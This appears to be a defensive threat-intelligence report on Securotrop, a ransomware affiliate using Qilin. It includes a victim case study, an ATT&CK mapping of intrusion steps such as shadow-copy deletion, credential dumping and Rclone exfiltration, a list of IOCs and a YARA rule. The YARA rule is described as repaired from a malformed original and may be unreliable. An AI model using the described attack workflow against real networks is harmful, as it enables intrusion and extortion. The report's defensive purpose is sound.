This report provides a comprehensive analysis of Securotrop, a newly identified, financially motivated organized crime group that emerged in October 2025. Securotrop executes a sophisticated double-extortion ransomware model, targeting organizations primarily within the Manufacturing, Construction, Services, Hospitality, and Agriculture sectors across the United States and Canada.
The group’s primary differentiator is its calculated and methodical approach to extortion. Unlike many ransomware operators who treat data exfiltration as a secondary pressure tactic, Securotrop conducts a detailed pre-negotiation analysis of stolen data. The group meticulously evaluates financial records, intellectual property, client lists, and other sensitive materials to accurately assess their economic and operational value. This intelligence-driven approach allows Securotrop to frame ransom demands and negotiation strategies based on the maximum potential damage a data leak would inflict upon the victim, significantly increasing the likelihood of a substantial payout.
Technically, Securotrop operates as an affiliate of the prolific Qilin Ransomware-as-a-Service (RaaS) platform. The group deploys the unmodified Qilin payload for the final encryption stage of its attacks. This payload is a potent, cross-platform malware written in Go and Rust, capable of targeting Windows, Linux, and VMware ESXi environments with strong encryption algorithms such as ChaCha20 and AES-256. Consequently, all technical intelligence pertaining to the Qilin ransomware is directly applicable to defending against the impact phase of a Securotrop intrusion.
The potential for severe and multifaceted damage from a Securotrop attack is significant, as demonstrated by the breach of Tiger Communications LLC. This incident resulted in the exfiltration of 243 GB of highly sensitive data, leading to operational disruption, financial loss, and extreme reputational and legal exposure.
Key recommendations for defense include:
- Harden Initial Access Vectors: Prioritize the patching of public-facing applications and secure all remote access services (e.g., VPN, RDP) with phishing-resistant multi-factor authentication (MFA).
- Enhance Detection of Post-Compromise Activity: Focus detection engineering efforts on identifying “living-off-the-land” techniques, such as the abuse of PowerShell, PsExec, and the deletion of Volume Shadow Copies, which are hallmarks of Securotrop’s manual, low-and-slow intrusion methodology.
- Implement a Resilient Recovery Strategy: Maintain and regularly test immutable, offline backups to ensure recovery capabilities in the event of a destructive attack that targets backup systems.
Threat Actor Profile: Securotrop (TA5XXX)
Origins and Attribution
Securotrop was first observed in October 2025 and is assessed with high confidence to be an organized crime group operating with a purely financial motivation. The group’s country of origin remains unknown. However, its use of the Qilin RaaS platform provides a potential, albeit unconfirmed, link to the Commonwealth of Independent States (CIS) region. The Qilin RaaS operation, like many of its predecessors, explicitly prohibits targeting entities within CIS countries and is known to recruit affiliates on Russian-language cybercrime forums, characteristics commonly associated with Russian-speaking threat actors. Securotrop’s adherence to this targeting model suggests a possible connection or alignment with this ecosystem.
Modus Operandi: Calculated Extortion
Securotrop’s operational model is defined by a sophisticated and psychologically potent double-extortion strategy. The group’s attack lifecycle is bifurcated into two distinct phases: comprehensive data theft followed by crippling system encryption. This creates two powerful points of leverage, forcing victims to negotiate not only for the restoration of their systems but also for the prevention of a catastrophic data leak.
What elevates Securotrop beyond many of its contemporaries is its core tactic of strategic data analysis. This is not merely data theft; it is a meticulous intelligence-gathering operation conducted after exfiltration but before negotiations commence. The group’s operators systematically review stolen repositories, analyzing financial statements, asset plans, client databases, intellectual property, and other sensitive business records to precisely quantify the potential damage a public leak would cause. This allows them to tailor ransom demands with a high degree of accuracy relative to the victim’s pain threshold. The ransom note itself is weaponized, often listing specific, high-value documents to prove the depth of the compromise and eliminate any doubt in the victim’s mind about the severity of the breach.
The group’s operational infrastructure is consistent with modern RaaS operations, utilizing a TOR-hosted control panel for affiliate management and secure, anonymous chatrooms for victim negotiations. A dedicated data leak site (DLS) is maintained to publish stolen data from organizations that refuse to pay, serving as both a consequence for non-compliance and a public demonstration of their capability to prospective victims.
Relationship with Qilin RaaS
Securotrop is an affiliate that leverages the Qilin ransomware platform, deploying its software payload without any apparent modification. This distinction is critical for accurate attribution, as demonstrated by the initial confusion during the Tiger Communications incident, where the attack was widely misattributed to the Qilin group itself due to the ransomware artifact.
This affiliate relationship exemplifies the specialization that makes the RaaS ecosystem so effective. The core Qilin operators focus on developing, maintaining, and updating a robust, evasive, and highly customizable ransomware payload and its associated infrastructure. They provide this platform to affiliates in exchange for a share of the profits, typically 15-20% of the final ransom payment.
This division of labor allows Securotrop to operate as a specialist in intrusion and extortion. Freed from the complexities of malware development, the group can dedicate its resources and expertise to the most difficult phases of an attack: gaining initial access, maintaining persistence, evading detection over long dwell times, and mastering the psychological aspects of negotiation. By leveraging a best-in-class payload from a dedicated developer, Securotrop becomes a more potent and efficient threat than a monolithic group that attempts to manage all aspects of the operation internally. This symbiotic relationship is a force multiplier, combining Qilin’s technical prowess in malware engineering with Securotrop’s strategic acumen in extortion.
Victimology and Impact Analysis
Targeting Scope
Securotrop demonstrates a clear and deliberate targeting strategy focused on maximizing financial gain while minimizing operational risk.
- Industries: The group predominantly targets commercial organizations in sectors with high operational dependencies and valuable data, including Manufacturing, Construction, Services, Hospitality, and Agriculture. The focus on manufacturing aligns with broader industry trends, which consistently show this sector to be one of the most heavily targeted by ransomware due to its low tolerance for downtime.
- Geography: The majority of identified victims are located in the United States and Canada.
- Exclusions: The group publicly states that it will not target organizations in the Healthcare, Government, or Religious sectors.
This pattern of exclusion points to a calculated, risk-averse targeting philosophy. The Qilin RaaS platform, which provides Securotrop’s payload, has been used in highly disruptive attacks against critical infrastructure, including the June 2024 attack on Synnovis, a pathology provider for the UK’s National Health Service. That incident caused widespread cancellation of medical procedures and generated a massive international law enforcement and media response. Securotrop’s explicit avoidance of such sectors suggests a strategic decision to operate below the threshold that would trigger a similar, disproportionate government response. By focusing on commercial entities, the group can pursue its financial objectives with a lower risk profile, indicating a mature approach designed for long-term operational viability rather than short-term notoriety.
Case Study: Tiger Communications LLC (October 2025)
The ransomware attack on Tiger Communications LLC, a Las Vegas-based company specializing in technological infrastructure, serves as a definitive example of Securotrop’s methodology and the severe impact of its operations.
- Incident Overview: In early October 2025, Securotrop operators compromised the company’s servers, exfiltrated a massive trove of data, and subsequently encrypted the systems. The attack was publicly claimed by Securotrop on its DLS, and the full dataset was later published online after negotiations presumably failed.
- Scale of Breach: The threat actors successfully exfiltrated approximately 243 GB of data, a significant volume indicating a deep and prolonged compromise of the company’s network.
- Data Compromised: Analysis of the leaked data reveals the catastrophic scope of the breach, encompassing the most sensitive categories of personal and corporate information. This dataset exemplifies the type of high-value information Securotrop seeks to leverage during extortion. The compromised data included:
- Personally Identifiable Information (PII): Copies of passports, birth certificates, residential addresses, phone numbers, and Social Security Numbers (SSNs).
- Corporate Financial and Legal Records: Comprehensive accounting files, tax documents, and an “Amended Certificate of Revocable Trust.”
- Sensitive Employee Data: Detailed payroll records, including annual gross salaries, hourly wages, employment contracts, and company contributions.
- Protected Health and Insurance Information (PHI): Medical reports, diagnoses, treatment documentation, employee contributions for medical coverage, and copies of insurance cards.
- Consequences and Impact: The attack inflicted multifaceted and lasting damage on the company and its stakeholders. Immediate impacts included operational downtime from encrypted servers and direct financial losses associated with incident response, recovery, and potential regulatory fines. The public release of the 243 GB data cache resulted in severe reputational damage, exposing the company, its employees, and its clients to significant long-term risks. These risks include identity theft, financial fraud, and potential corporate espionage. Furthermore, the exposure of such deeply personal employee data can lead to severe psychological distress and a loss of trust within the organization.
Technical Analysis: Anatomy of a Securotrop Attack (MITRE ATT&CK® Mapping)
Securotrop’s attack methodology is characterized by a patient, hands-on-keyboard approach designed to evade detection during a prolonged dwell time, culminating in the deployment of the Qilin ransomware. The following TTPs represent a composite view of a typical Securotrop intrusion.
A structured view of the threat actor’s behavior is essential for SOC analysts to map existing security controls, identify defensive gaps, and prioritize detection engineering efforts. The MITRE ATT&CK framework provides a standardized language for describing these adversary actions.
| Tactic | Technique ID | Technique Name | Description of Securotrop/Qilin Usage |
| Initial Access | T1190 | Exploit Public-Facing Application | Exploits known vulnerabilities in internet-facing software, such as CVE-2023-27532 in Veeam Backup & Replication, to gain an initial foothold. |
| T1133 | External Remote Services | Targets and exploits misconfigured or vulnerable VPNs and other remote access services to breach the network perimeter. | |
| T1566 | Phishing | Uses phishing and spear-phishing emails with malicious attachments or links to trick employees into executing initial access payloads. | |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | Heavily utilizes PowerShell for a wide range of post-compromise activities, including discovery, defense evasion, and execution of payloads, blending in with legitimate administrative tasks. |
| Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task | Creates scheduled tasks to maintain persistence on compromised systems, ensuring their tools survive reboots and can be executed at later times. |
| Privilege Escalation | T1068 | Exploitation for Privilege Escalation | Leverages local vulnerabilities to escalate privileges from a standard user to an administrator or SYSTEM-level account. |
| Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools | Terminates processes and services associated with antivirus (AV) and endpoint detection and response (EDR) solutions to operate unimpeded. |
| T1070 | Indicator Removal on Host | Clears Windows Event Logs and other forensic artifacts to hide their tracks and complicate incident response investigations. | |
| T1490 | Inhibit System Recovery | Deletes Volume Shadow Copies (VSS) using vssadmin.exe or WMI to prevent easy system restoration from local backups, increasing pressure to pay the ransom. | |
| Credential Access | T1003 | OS Credential Dumping | Employs tools like Mimikatz to extract plaintext passwords, hashes, and Kerberos tickets from memory (e.g., the LSASS process). |
| Discovery | T1018 | Remote System Discovery | Conducts network reconnaissance using tools like Nmap or PowerShell scripts to identify high-value assets such as domain controllers and backup servers. |
| Lateral Movement | T1021.001 | Remote Services: Remote Desktop Protocol | Uses RDP extensively with stolen credentials to move between systems within the compromised network. |
| Collection | T1005 | Data from Local System | Gathers and stages sensitive files from local systems and network shares in preparation for exfiltration. |
| Exfiltration | T1048 | Exfiltration Over Alternative Protocol | Uses legitimate data transfer tools like Rclone, WinSCP, and FileZilla to exfiltrate large volumes of data to attacker-controlled external servers. |
| Impact | T1486 | Data Encrypted for Impact | Deploys the Qilin ransomware payload across the network to encrypt files on Windows, Linux, and VMware ESXi systems, rendering them inaccessible. |
Attack Lifecycle Elaboration
Initial Access (TA0001)
Securotrop affiliates gain their initial foothold through a variety of common but effective vectors. They are known to exploit unpatched vulnerabilities in public-facing applications, with a notable example being CVE-2023-27532 in Veeam Backup & Replication software, which allows an attacker to retrieve encrypted credentials stored within the configuration database. They also target external remote services, such as poorly secured VPNs, particularly Fortinet devices, which serve as a direct gateway into the corporate network. Alongside these technical exploits, the group employs traditional phishing and spear-phishing campaigns to deceive users into executing malicious code via tainted attachments or links.
Post-Compromise and Defense Evasion (TA0002 – TA0005)
Once inside a network, Securotrop operators prioritize stealth and persistence. Their reliance on manual, hands-on-keyboard techniques is a deliberate and sophisticated strategy to counter modern security solutions. Automated security platforms like EDR and XDR are often tuned to detect patterns of rapid, machine-speed activity characteristic of automated malware. By operating “low and slow” and using legitimate system administration tools—a technique known as “living-off-the-land”—Securotrop’s actions can be difficult to distinguish from normal network management.
They make extensive use of PowerShell and the Windows Command Shell for execution, discovery, and lateral movement. Persistence is often achieved by creating scheduled tasks that ensure their tools remain active after system reboots. A critical phase of their operation involves systematically dismantling the target’s defenses. This includes terminating security processes, clearing Windows Event Logs to erase evidence of their activity, and, most importantly, inhibiting system recovery. They consistently use the native Windows utility vssadmin.exe or WMI commands to delete all Volume Shadow Copies, thereby removing the victim’s first and easiest option for data restoration and significantly increasing the leverage for their ransom demand.
Lateral Movement, Exfiltration, and Impact (TA0006 – TA0040)
With elevated privileges, operators move laterally through the network. They use credential dumping tools like Mimikatz to harvest credentials from memory and then use those credentials with tools like RDP and PsExec to access other systems. After mapping the network and identifying high-value data repositories, they begin the collection and exfiltration phase. Large volumes of data are staged and then transferred out of the network using common file transfer tools like Rclone or WinSCP, which can be difficult to block as they often use standard protocols like SFTP or HTTPS.
Only after the data has been successfully exfiltrated and defenses have been disabled do the operators proceed to the final impact stage: deploying the Qilin ransomware. The payload, written in Go and Rust, is highly effective and can target a wide range of operating systems, including Windows clients, servers, and VMware ESXi hypervisors, allowing for the disruption of virtualized environments. The ransomware uses a combination of strong encryption algorithms, including ChaCha20, AES-256, and RSA-4096, which makes recovery of the encrypted files without the decryption key computationally impossible. The payload is also highly configurable through the RaaS panel, allowing Securotrop to customize the attack for each specific victim, including which file types to target, which processes to terminate, and the specific text of the ransom note dropped on compromised systems.
Indicators of Compromise (IOCs)
This section provides actionable Indicators of Compromise (IOCs) identified during investigations into Securotrop and Qilin ransomware activity. These indicators can be used by SOC analysts and threat hunters to search for evidence of a compromise within their environments.
The following table consolidates known file hashes, malicious file names, and network indicators. This data provides concrete artifacts for searching logs, SIEMs, and endpoint telemetry.
| Indicator Type | Indicator Value | Description | Source(s) (internal numbering, on request) |
| SHA256 | 93c16c11ffca4ede29338eac53ca9f7c4fbcf68b8ea85ea5ae91a9e00dc77f01 | Qilin/Agenda ransomware payload | 17 |
| SHA256 | 54ff98956c3a0a3bc03a5f43d2c801ebcc1255bed644c78bad55d7f7beebd294 | Qilin/Agenda ransomware payload | 17 |
| SHA256 | e4882b8e8e414e983cf003a5c4038043002a004b63c4f0844a15268332597e80 | Qilin/Agenda ransomware payload | 17 |
| SHA256 | 555964b2fed3cced4c75a383dd4b3cf02776dae224f4848dcc03510b1de4dbf4 | Qilin/Agenda ransomware payload (ELF format for Linux/ESXi) | 17 |
| SHA256 | 0629cd5e187174cb69f3489675f8c84cc0236f11f200be384ed6c1a9aa1ce7a1 | Qilin/Agenda ransomware payload (ELF format for Linux/ESXi) | 17 |
| SHA256 | bf9fc34ef4734520a1f65c1ec0a91b563bf002ac63982cbd2df10791493e9147 | Qilin/Agenda ransomware payload | 17 |
| SHA256 | cd27a31e618fe93df37603e5ece3352a91f27671ee73bdc8ce9ad793cad72a0f | Qilin/Agenda ransomware payload | 17 |
| SHA256 | c26ce932f3609ecd710a3a1ca7f7b96f1b103a11b49a86e9423e03664eaabd40 | Qilin/Agenda ransomware payload (DLL) | 17 |
| SHA256 | 8e1eb0ad22236e325387fdb45aea63f318a672c5d035a21d7b3a64eeafb4c5a2 | Qilin/Agenda ransomware payload | 17 |
| SHA256 | aeddd8240c09777a84bb24b5be98e9f5465dc7638bec41fb67bbc209c3960ae1 | main.exe, Go-based reverse proxy tool for C2 tunneling | 27 |
| SHA256 | 011df46e94218cbb2f0b8da13ab3cec397246fdc63436e58b1bf597550a647f6 | TPwSav.sys, vulnerable driver used for kernel-level manipulation | 27 |
| SHA256 | 3dfae7b23f6d1fe6e37a19de0e3b1f39249d146a1d21102dcc37861d337a0633 | upd.exe, renamed binary used to disable EDR and evade detection | 22 |
| File Name | w.exe | Commonly observed filename for the Qilin ransomware payload | 4 |
| File Name | enc.exe | Qilin/Agenda ransomware executable | 17 |
| File Name | update.exe | Qilin/Agenda ransomware executable | 17 |
| File Name | 99.dll | Qilin/Agenda ransomware library | 17 |
| File Name | decryptor_399060b2.exe | Qilin/Agenda decryptor tool | 17 |
| IP Address | 31.192.107.144 | Anomalous IP linked to a Russian cloud hosting provider, used for initial VPN access | 27 |
| IP Address | 216.120.203.26 | External C2 host for encrypted SSH tunnel (hosted by Shock Hosting) | 27 |
| IP Address | 137.184.243.69 | Malicious or rare external endpoint associated with Qilin activity | 7 |
| IP Address | 66.165.243.39 | Malicious or rare external endpoint associated with Qilin activity | 7 |
| Domain | advanced-ip-scanner.com | Malicious domain associated with Qilin reconnaissance activity | 7 |
Detection Rules: YARA
YARA rules are instrumental for threat hunters and incident responders to identify malicious files on endpoints or in repositories. The following rule is designed to detect the Qilin ransomware loader used by Securotrop affiliates by matching specific byte patterns and characteristics of the executable file.
/* Qilin ransomware Windows loader detection rule. NOTE: This rule has been repaired from a malformed original. It identifies a potential byte pattern but should be tested and validated.*/import "pe"rule Qilin_Loader_Heuristic { meta: author = "rivitna" family = "ransomware.qilin.windows" description = "Detects potential Qilin ransomware Windows loader" severity = 10 score = 100 source_note = "Corrected from original report TL-2025-1021-SEC-01" strings: // Byte sequence observed in samples $hex_pattern_1 = { 85 C0 75 12 E8 85 C0 0F 84 ?? 0? 00 00 A3 68 00?? ( 2? | 3? | 4? ) 00 6A 00 50 E8 85 C0 0F 84 ?? 0? 00 00 8B 0D 85 C9 74 05 E8 8B F0 85 F6 74 05 E8 85 C0 75 ?? 68 } condition: // Check for PE file header (MZ) and the presence of the hex pattern uint16(0) == 0x5a4d and $hex_pattern_1}
